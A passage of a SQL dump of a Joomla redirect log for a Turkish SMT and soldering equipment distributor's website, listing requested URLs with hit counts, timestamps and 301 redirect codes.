00:00:00',301),(9550,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',563,0,'2017-11-06 17:09:07','0000-00-00 00:00:00',301),(9551,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',570,0,'2017-11-06 17:09:12','0000-00-00 00:00:00',301),(9552,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',573,0,'2017-11-06 17:09:13','0000-00-00 00:00:00',301),(9553,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',576,0,'2017-11-06 17:09:15','0000-00-00 00:00:00',301),(9554,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',578,0,'2017-11-06 17:09:18','0000-00-00 00:00:00',301),(9555,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',569,0,'2017-11-06 17:09:22','0000-00-00 00:00:00',301),(9556,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,category_name',NULL,'','',41,0,'2017-11-06 17:12:19','0000-00-00 00:00:00',301),(9557,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-06 17:19:02','0000-00-00 00:00:00',301),(9558,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-06 17:26:06','0000-00-00 00:00:00',301),(9559,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-06 17:26:37','0000-00-00 00:00:00',301),(9560,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-06 17:38:41','0000-00-00 00:00:00',301),(9561,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/k_cwt_250x250.png',NULL,'','',5,0,'2017-11-06 17:40:34','0000-00-00 00:00:00',301),(9562,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-06 17:42:36','0000-00-00 00:00:00',301),(9563,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-06 17:46:50','0000-00-00 00:00:00',301),(9564,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',21,0,'2017-11-06 17:47:51','0000-00-00 00:00:00',301),(9565,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',10,0,'2017-11-06 18:06:13','0000-00-00 00:00:00',301),(9566,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',50,0,'2017-11-06 18:10:31','0000-00-00 00:00:00',301),(9567,'http://www.3s-technologies.com.tr/en/robots.txt',NULL,'','',1564,0,'2017-11-06 18:12:12','0000-00-00 00:00:00',301),(9568,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,mf_name?language=en-gb',NULL,'','',24,0,'2017-11-06 18:18:32','0000-00-00 00:00:00',301),(9569,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',202,0,'2017-11-06 18:20:11','0000-00-00 00:00:00',301),(9570,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',74,0,'2017-11-06 18:21:55','0000-00-00 00:00:00',301),(9571,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı',NULL,'','',413,0,'2017-11-06 18:25:45','0000-00-00 00:00:00',301),(9572,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-06 18:32:08','0000-00-00 00:00:00',301),(9573,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri',NULL,'','',69,0,'2017-11-06 18:34:50','0000-00-00 00:00:00',301),(9574,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',205,0,'2017-11-06 18:35:00','0000-00-00 00:00:00',301),(9575,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-06 18:38:22','0000-00-00 00:00:00',301),(9576,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/dirdesc?language=en-gb',NULL,'','',12,0,'2017-11-06 18:39:33','0000-00-00 00:00:00',301),(9577,'http://3s-technologies.com.tr/en/products/mi-300-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-06 18:41:29','0000-00-00 00:00:00',301),(9578,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-11-06 18:54:02','0000-00-00 00:00:00',301),(9579,'http://www.3s-technologies.com.tr/en/products/thru-hole',NULL,'','',89,0,'2017-11-06 18:59:25','0000-00-00 00:00:00',301),(9580,'http://3s-technologies.com.tr/en/products/screen-printer/by,mf_name',NULL,'','',9,0,'2017-11-06 19:11:12','0000-00-00 00:00:00',301),(9581,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux',NULL,'','',78,0,'2017-11-06 19:19:01','0000-00-00 00:00:00',301),(9582,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,category_name',NULL,'','',235,0,'2017-11-06 19:20:00','0000-00-00 00:00:00',301),(9583,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-11-06 19:25:18','0000-00-00 00:00:00',301),(9584,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',336,0,'2017-11-06 19:26:25','0000-00-00 00:00:00',301),(9585,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',339,0,'2017-11-06 19:26:26','0000-00-00 00:00:00',301),(9586,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',341,0,'2017-11-06 19:26:28','0000-00-00 00:00:00',301),(9587,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',342,0,'2017-11-06 19:26:30','0000-00-00 00:00:00',301),(9588,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',570,0,'2017-11-06 19:26:32','0000-00-00 00:00:00',301),(9589,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',608,0,'2017-11-06 19:26:33','0000-00-00 00:00:00',301),(9590,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name?language=en-gb',NULL,'','',4,0,'2017-11-06 19:26:37','0000-00-00 00:00:00',301),(9591,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name?language=en-gb',NULL,'','',3,0,'2017-11-06 19:26:38','0000-00-00 00:00:00',301),(9592,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',536,0,'2017-11-06 19:26:40','0000-00-00 00:00:00',301),(9593,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',269,0,'2017-11-06 19:26:42','0000-00-00 00:00:00',301),(9594,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku?language=en-gb',NULL,'','',5,0,'2017-11-06 19:26:46','0000-00-00 00:00:00',301),(9595,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',514,0,'2017-11-06 19:26:48','0000-00-00 00:00:00',301),(9596,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',241,0,'2017-11-06 19:26:51','0000-00-00 00:00:00',301),(9597,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',6,0,'2017-11-06 19:26:56','0000-00-00 00:00:00',301),(9598,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name?language=en-gb',NULL,'','',4,0,'2017-11-06 19:26:57','0000-00-00 00:00:00',301),(9599,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',5,0,'2017-11-06 19:26:59','0000-00-00 00:00:00',301),(9600,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',4,0,'2017-11-06 19:27:01','0000-00-00 00:00:00',301),(9601,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı',NULL,'','',494,0,'2017-11-06 19:27:03','0000-00-00 00:00:00',301),(9602,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku?language=en-gb',NULL,'','',3,0,'2017-11-06 19:27:04','0000-00-00 00:00:00',301),(9603,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',242,0,'2017-11-06 19:27:09','0000-00-00 00:00:00',301),(9604,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',244,0,'2017-11-06 19:27:10','0000-00-00 00:00:00',301),(9605,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',245,0,'2017-11-06 19:27:14','0000-00-00 00:00:00',301),(9606,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name',NULL,'','',497,0,'2017-11-06 19:27:16','0000-00-00 00:00:00',301),(9607,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',249,0,'2017-11-06 19:27:17','0000-00-00 00:00:00',301),(9608,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,mf_name',NULL,'','',494,0,'2017-11-06 19:27:19','0000-00-00 00:00:00',301),(9609,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,mf_name/dirdesc?language=en-gb',NULL,'','',248,0,'2017-11-06 19:27:21','0000-00-00 00:00:00',301),(9610,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,ordering?language=en-gb',NULL,'','',247,0,'2017-11-06 19:27:22','0000-00-00 00:00:00',301),(9611,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name',NULL,'','',496,0,'2017-11-06 19:27:24','0000-00-00 00:00:00',301),(9612,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,product_name/dirdesc?language=en-gb',NULL,'','',247,0,'2017-11-06 19:27:26','0000-00-00 00:00:00',301),(9613,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/dirdesc',NULL,'','',251,0,'2017-11-06 19:27:27','0000-00-00 00:00:00',301),(9614,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',250,0,'2017-11-06 19:27:29','0000-00-00 00:00:00',301),(9615,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/ly-8c-detail',NULL,'','',247,0,'2017-11-06 19:27:31','0000-00-00 00:00:00',301),(9616,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı',NULL,'','',252,0,'2017-11-06 19:27:34','0000-00-00 00:00:00',301),(9617,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız',NULL,'','',252,0,'2017-11-06 19:27:36','0000-00-00 00:00:00',301),(9618,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme',NULL,'','',246,0,'2017-11-06 19:27:38','0000-00-00 00:00:00',301),(9619,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',498,0,'2017-11-06 19:27:39','0000-00-00 00:00:00',301),(9620,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',248,0,'2017-11-06 19:27:45','0000-00-00 00:00:00',301),(9621,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',250,0,'2017-11-06 19:27:46','0000-00-00 00:00:00',301),(9622,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/dirdesc?language=en-gb',NULL,'','',36,0,'2017-11-06 19:27:48','0000-00-00 00:00:00',301),(9623,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',251,0,'2017-11-06 19:27:52','0000-00-00 00:00:00',301),(9624,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',252,0,'2017-11-06 19:27:54','0000-00-00 00:00:00',301),(9625,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',252,0,'2017-11-06 19:27:56','0000-00-00 00:00:00',301),(9626,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name?language=en-gb',NULL,'','',250,0,'2017-11-06 19:27:57','0000-00-00 00:00:00',301),(9627,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name?language=en-gb',NULL,'','',253,0,'2017-11-06 19:27:59','0000-00-00 00:00:00',301),(9628,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name?language=en-gb',NULL,'','',248,0,'2017-11-06 19:28:01','0000-00-00 00:00:00',301),(9629,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı?language=en-gb',NULL,'','',253,0,'2017-11-06 19:28:02','0000-00-00 00:00:00',301),(9630,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,category_name?language=en-gb',NULL,'','',251,0,'2017-11-06 19:28:04','0000-00-00 00:00:00',301),(9631,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,mf_name?language=en-gb',NULL,'','',258,0,'2017-11-06 19:28:06','0000-00-00 00:00:00',301),(9632,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',513,0,'2017-11-06 19:28:08','0000-00-00 00:00:00',301),(9633,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',506,0,'2017-11-06 19:28:11','0000-00-00 00:00:00',301),(9634,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',252,0,'2017-11-06 19:28:15','0000-00-00 00:00:00',301),(9635,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',514,0,'2017-11-06 19:28:16','0000-00-00 00:00:00',301),(9636,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',257,0,'2017-11-06 19:28:18','0000-00-00 00:00:00',301),(9637,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',258,0,'2017-11-06 19:28:20','0000-00-00 00:00:00',301),(9638,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın',NULL,'','',254,0,'2017-11-06 19:28:21','0000-00-00 00:00:00',301),(9639,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,category_name',NULL,'','',510,0,'2017-11-06 19:28:23','0000-00-00 00:00:00',301),(9640,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,mf_name',NULL,'','',510,0,'2017-11-06 19:28:25','0000-00-00 00:00:00',301),(9641,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_name',NULL,'','',515,0,'2017-11-06 19:28:27','0000-00-00 00:00:00',301),(9642,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/by,product_sku',NULL,'','',514,0,'2017-11-06 19:28:28','0000-00-00 00:00:00',301),(9643,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',266,0,'2017-11-06 19:28:30','0000-00-00 00:00:00',301),(9644,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-fırın/ly-8c-detail',NULL,'','',261,0,'2017-11-06 19:28:32','0000-00-00 00:00:00',301),(9645,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı',NULL,'','',259,0,'2017-11-06 19:28:38','0000-00-00 00:00:00',301),(9646,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/am100-detail',NULL,'','',259,0,'2017-11-06 19:28:41','0000-00-00 00:00:00',301),(9647,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',258,0,'2017-11-06 19:28:44','0000-00-00 00:00:00',301),(9648,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',260,0,'2017-11-06 19:28:45','0000-00-00 00:00:00',301),(9649,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',258,0,'2017-11-06 19:28:47','0000-00-00 00:00:00',301),(9650,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',256,0,'2017-11-06 19:28:49','0000-00-00 00:00:00',301),(9651,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız',NULL,'','',256,0,'2017-11-06 19:28:50','0000-00-00 00:00:00',301),(9652,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',248,0,'2017-11-06 19:28:52','0000-00-00 00:00:00',301),(9653,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',258,0,'2017-11-06 19:28:54','0000-00-00 00:00:00',301),(9654,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',256,0,'2017-11-06 19:28:56','0000-00-00 00:00:00',301),(9655,'http://www.3s-technologies.com.tr/tr/cmspages/getcmsversion.aspx?versionkey=miwq9/bjjcx9jhcesgmuk5pttmynvalxcp4infcpknrxo4ml4nibns7cmpkq+tuxb332kqqn6nathz/vl+d1lakqxn7/rtjl2o4xnhcz2ypiqexbnxigdgxgxgd2eid4zncbd/ga8v1agvmca6bhphlkxdieij+c9u1qs1gpm4iilfetmozivynkbptj9bbpnoofwtez4i8wdt3jmtfm/bkmryeck4hss/lmycetjkn1x7omoed8etktzsqxgha4vosp+ycdjvqlznsw/jzql2dmkqcwcmb/ut5lymmal7uoqxtgr2lp25quysr6mn+zd6tvwftooerasioqtdeikg==',NULL,'','',1,0,'2017-11-06 19:40:47','0000-00-00 00:00:00',301),(9656,'http://www.3s-technologies.com.tr/tr/cmsdesk',NULL,'','',1,0,'2017-11-06 19:40:48','0000-00-00 00:00:00',301),(9657,'http://www.3s-technologies.com.tr/en/products/screen-printer',NULL,'','',103,0,'2017-11-06 19:42:21','0000-00-00 00:00:00',301),(9658,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri',NULL,'','',67,0,'2017-11-06 19:50:44','0000-00-00 00:00:00',301),(9659,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-06 19:52:47','0000-00-00 00:00:00',301),(9660,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',79,0,'2017-11-06 20:10:07','0000-00-00 00:00:00',301),(9661,'http://www.3s-technologies.com.tr/en/home2',NULL,'','',103,0,'2017-11-06 20:16:48','0000-00-00 00:00:00',301),(9662,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-06 20:26:53','0000-00-00 00:00:00',301),(9663,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',386,0,'2017-11-06 20:35:32','0000-00-00 00:00:00',301),(9664,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/kester',NULL,'','',12,0,'2017-11-06 20:36:29','0000-00-00 00:00:00',301),(9665,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/tolo',NULL,'','',21,0,'2017-11-06 20:47:25','0000-00-00 00:00:00',301),(9666,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,category_name',NULL,'','',377,0,'2017-11-06 20:49:17','0000-00-00 00:00:00',301),(9667,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-06 20:58:18','0000-00-00 00:00:00',301),(9668,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-06 20:59:59','0000-00-00 00:00:00',301),(9669,'http://3s-technologies.com.tr/index.php/tr/ueruenler/275-k100-1mm-28-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-06 21:00:22','0000-00-00 00:00:00',301),(9670,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,product_sku?language=en-gb',NULL,'','',25,0,'2017-11-06 21:13:23','0000-00-00 00:00:00',301),(9671,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,product_name',NULL,'','',10,0,'2017-11-06 21:18:55','0000-00-00 00:00:00',301),(9672,'http://3s-technologies.com.tr/index.php/en/products/rh6-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-06 21:24:34','0000-00-00 00:00:00',301),(9673,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/cs40-detail',NULL,'','',66,0,'2017-11-06 21:27:05','0000-00-00 00:00:00',301),(9674,'http://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.6mm-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-11-06 21:33:17','0000-00-00 00:00:00',301),(9675,'http://www.3s-technologies.com.tr/en/products/jvk-detail?tmpl=component&print=1',NULL,'','',28,0,'2017-11-06 21:41:24','0000-00-00 00:00:00',301),(9676,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',374,0,'2017-11-06 22:03:50','0000-00-00 00:00:00',301),(9677,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name?language=en-gb',NULL,'','',25,0,'2017-11-06 22:06:16','0000-00-00 00:00:00',301),(9678,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-detail',NULL,'','',17,0,'2017-11-06 22:14:54','0000-00-00 00:00:00',301),(9679,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',38,0,'2017-11-06 22:19:12','0000-00-00 00:00:00',301),(9680,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',8,0,'2017-11-06 22:19:23','0000-00-00 00:00:00',301),(9681,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-06 22:25:06','0000-00-00 00:00:00',301),(9682,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-06 22:35:23','0000-00-00 00:00:00',301),(9683,'http://3s-technologies.com.tr/tr/urunler/ess-310-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-06 22:39:52','0000-00-00 00:00:00',301),(9684,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/av132-detail',NULL,'','',1,0,'2017-11-06 22:40:34','0000-00-00 00:00:00',301),(9685,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-06 22:42:07','0000-00-00 00:00:00',301),(9686,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',21,0,'2017-11-06 22:50:43','0000-00-00 00:00:00',301),(9687,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&itemid=103&lang=tr',NULL,'','',6,0,'2017-11-06 22:53:11','0000-00-00 00:00:00',301),(9688,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-06 22:56:36','0000-00-00 00:00:00',301),(9689,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?language=en-gb&product_sku',NULL,'','',2,0,'2017-11-06 23:08:26','0000-00-00 00:00:00',301),(9690,'http://3s-technologies.com.tr/index.php/en/products/flux/by,mf_name/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-06 23:08:53','0000-00-00 00:00:00',301),(9691,'http://3s-technologies.com.tr/tr/urunler/thru-hole',NULL,'','',46,0,'2017-11-06 23:10:58','0000-00-00 00:00:00',301),(9692,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-06 23:20:01','0000-00-00 00:00:00',301),(9693,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',25,0,'2017-11-06 23:39:52','0000-00-00 00:00:00',301),(9694,'http://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim',NULL,'','',418,0,'2017-11-06 23:42:02','0000-00-00 00:00:00',301),(9695,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',240,0,'2017-11-06 23:56:30','0000-00-00 00:00:00',301),(9696,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim?error=404',NULL,'','',1,0,'2017-11-07 00:04:47','0000-00-00 00:00:00',301),(9697,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/aqueous',NULL,'','',32,0,'2017-11-07 00:09:49','0000-00-00 00:00:00',301),(9698,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',36,0,'2017-11-07 00:10:57','0000-00-00 00:00:00',301),(9699,'http://www.3s-technologies.com.tr/index.php/en/products/ess-310-24-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-07 00:20:26','0000-00-00 00:00:00',301),(9700,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-32-33-detail?print=1&tmpl=component',NULL,'','',3,0,'2017-11-07 00:21:43','0000-00-00 00:00:00',301),(9701,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',17,0,'2017-11-07 00:35:57','0000-00-00 00:00:00',301),(9702,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_sku?language=tr-tr',NULL,'','',8,0,'2017-11-07 00:45:43','0000-00-00 